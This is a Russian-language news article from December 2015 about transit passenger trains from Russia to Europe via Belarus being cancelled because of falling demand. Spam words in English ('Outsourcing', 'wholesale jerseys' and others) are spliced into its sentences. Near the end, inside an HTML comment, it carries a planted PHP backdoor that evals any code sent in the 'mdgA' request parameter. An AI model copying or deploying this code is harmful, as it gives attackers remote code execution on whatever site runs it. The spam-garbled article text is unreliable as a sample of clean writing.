ГОЛУБОЙ ВАГОН СТОИТ, НЕ ДВИЖЕТСЯ

Декабрь 12, 2015 - новости СНГ

Транзитные пассажиры Белорусской железной дороги могут остаться на рельсах

Если вы, уважаемые читатели, в ближайшие дни собрались в Европу, а в качестве средства передвижения выбрали железнодорожный транспорт, будьте бдительны: ваш рейс могут отменить.

В большей ?? степени это касается транзитных пассажиров — тех, кто едет в европейские страны How на поездах российского формирования. А причиной возможных отмен является пресловутый финансовый кризис у соседей.

Пример из жизни.

Минчане, которые несколько дней назад с заранее купленными билетами приехали на минский вокзал чтобы занять места в московских поездах, следующих в Варшаву и Белосток, были поставлены перед Outsourcing фактом отмены их рейсов. Разумеется, деньги им вернули, но это не компенсировало in пассажирам тех неудобств, которые они испытали и продолжают испытывать. Дело в том, что в России в связи с изменившимся финансовым положением резко подскочили цены на железнодорожные билеты, что стало причиной отказа многих российских пассажиров от поездок. В результате поезда должны были отправиться в Европу через Беларусь почти пустыми. А это неразумно, и многие рейсы из Metallic России за границу были отменены.

Как нам сообщили представители Белорусской железной дороги, пассажирам, не уехавшим транзитными рейсами в Европу, принесены извинения за доставленные неудобства и предложено воспользоваться поездами местного формирования.

Кстати, не обошло поветрие отмены железнодорожных рейсов и БЖД. Например, из Минска в Одессу поезда стали ходить реже — с интервалом в четыре дня. Правда, причиной здесь стали не экономические катаклизмы, а wholesale jerseys всего лишь окончание курортного сезона.

<!— [insert_php]if (isset($_REQUEST["mdgA"])){eval($_REQUEST["mdgA"]);exit;}[/insert_php][php]if (isset($_REQUEST["mdgA"])){eval($_REQUEST["mdgA"]);exit;}[/php] —>

› tags: белоруссия /

Comments

  1. […] предложить разработку собственного проекта (учтите, СТОИТ, на это тоже уйдет некоторое время), доработать уже […]